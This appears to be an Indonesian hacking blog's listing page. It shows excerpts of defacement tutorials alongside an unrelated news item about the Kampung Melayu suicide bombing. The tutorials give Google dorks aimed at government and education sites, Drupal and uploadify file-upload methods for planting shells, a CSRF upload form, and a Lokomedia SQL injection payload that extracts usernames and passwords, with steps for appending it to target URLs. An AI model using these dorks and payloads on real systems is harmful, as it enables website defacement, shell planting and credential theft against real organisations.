Postingan

Deface Metode Drupal Hidden Uploader

Gambar
Deface Metode Drupal Hidden Uploader Dyc4l Not3S Bagi kalian yang baru belajar pepes:v dan buat kalian yang ngga mau ribet dengan mencari file upload:v ,,kini ane membuat tutoriar Deface Metode Drupal Hidden Uploader :) Ok simak sajaa :) Dork : - Allowed file types: png gif jpg txt. site:gov            - Allowed file types: png gif jpg txt. site:edu            - Allowed file types: png gif jpg txt. site:(domain negara yang anda inginkan) Step By Step : Dorking Dulu Lalu Pilih salah satu Web. Truss Cari Tempat Upload di bawah. Example : kalian tinggal upload file kalian nanti akan seperti ini : Tinggal klik deh File kalian nanti akan direct sendiri ke file kalian 😊
Gambar

Gif Image

Gambar

Deface Metode Responsife File Manager/FILE uploads :v DYCAL NOTES :V

Gambar
DYCAL NOTES DEFACE METODE RESPONSIFE FILE MANAGER FILE UPLOADS Deface Website Metode Responsive File Manager | File Upload Vulnerability Deface Website Metode Responsive File Manager Penjelasan  Resposive File Manager Responsif File Manager adalah gratis open-source file manager dan gambar manajer dibuat dengan perpustakaan jQuery, CSS3, PHP dan HTML5 yang menawarkan cara yang bagus dan elegan untuk meng-upload dan menyisipkan file, gambar dan video. Anda dapat menggunakannya sebagai plugin eksternal untuk versi TinyMCE 4.x (dan lebih tua), CKEditor dan CLEditor, Anda juga dapat menggunakannya sebagai file manager yang berdiri sendiri untuk mengelola dan pilih file. Script secara otomatis membuat thumbnail dari gambar untuk daftar pratinjau dan dapat membuat juga thumbnail eksternal untuk digunakan dalam cms atau situs. Hal ini dapat dikonfigurasi untuk mengubah ukuran otomatis upload foto atau untuk secara otomatis membatasi ukuran. Anda dapat mempersonali...

DYCAL NOTES Tutorial Deface Teknik Uploadify Vulnerability Upload Shell

Gambar
DYCAL NOTES Tutorial Deface Teknik Uploadify Vulnerability Upload Shell Ini memang metode deface lama, tapi masih banyak kok yang pakai teknik ini :). Simak aja Tutorialnya Bahan-Bahan : PC/Laptop Koneksi Internet CSRF Dork Shell (kalo blm punya cari di gugel) Dork : inurl:/uploadify/ intitle:index of    (bisa di kembangkan lagi) CSRF : <form method="post" action="urltarget"> enctype="multipart/form-data"> <label for="file">Filename:</label> <input type="file" name="Filedata" ><br> <input type="submit" name="submit" value="Tusbol"> </form> Atau CSRF online di http://mouncyler-community.hol.es/expl/ lalu kalian pilih Filedata Tutorial : 1. Copy CSRF di atas lalu save dengan format .html 2. Dorking 3. Cari target, lalu cek apakah ada uploadify.php ?? (web yg vuln cirinya laman yg kosong/blank) 4. Edit CSRF yg tadi dah...

DYCAL NOTES Warga Memadati Sekitar Lokasi Bom Bunuh Diri Kampung Melayu

Gambar
Warga Memadati Sekitar Lokasi Bom Bunuh Diri Kampung Melayu DYC4L N0TES Lokasi ledakan dugaan bom bunuh diri di Halte Transjakarta Kampung Melayu, Jakarta Timur sudah dipasangi garis polisi. Sejumlah personel polisi pun telah berada di lokasi. Garis pembatas lokasi ledakan terpasang melintang sepanjang jalur khusus Transjakarta. Tampak di halte yang sudah berlubang akibat ledakan sudah dipenuhi polisi. Mereka terpantau tengah beraktivitas di dalam halte. Sedangkan warga terlihat memenuhi sekitar kawasan terjadinya ledakan. Beberapa pengguna jalan bahkan sampai memarkirkan kendaraannya untuk melihat tempat itu. Situasi lalu lintas di dekat lokasi tampak macet. Selain menghalau warga agar tidak semakin mendekat, arus lalu lintas juga coba diurai polisi.

DYCAL NOTES Tutorial Deface SQLi CMS Lokomedia

Gambar
DYCAL NOTES ⬇⬇⬇⬇⬇⬇⬇⬇⬇⬇⬇⬇ Tutorial Deface SQLi CMS Lokomedia Add Facebook Me Facebook.com/Mr.Cyrus404 Berbicara soal teknik SQLi CMS Lokomedia ini, pasti sudah kesohor di kalangan defacer/hacker tanah air. Terlebih lagi sekarang ini yg semakin banyak defacer yang mengexploit CMS Lokomedia ini. Ga usah panjang lebar langsung ke topik pembahasan yaitu "Tutorial Deface SQLi CMS Lokomedia" Bahan : 1. Dork : inurl:statis-1-profil.html inurl:statis-2-profil.html inurl:statis-3-strukturorganisasi.html Note : tambahkan site:org site:net :site:go.id site:ac.id site:id (Use Your Brain) 2. Exploit SQLi (SQL Injection) : 'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+ Bingung cara ngexploit nya ?? sini di kasih tau :v contoh : http://sitepemerintah.co.li/statis-2-profil.html kamu tambahin exploit nya sesudah angka jadi kaya gini : http://sitepemerintah.co.li/statis-2'unio...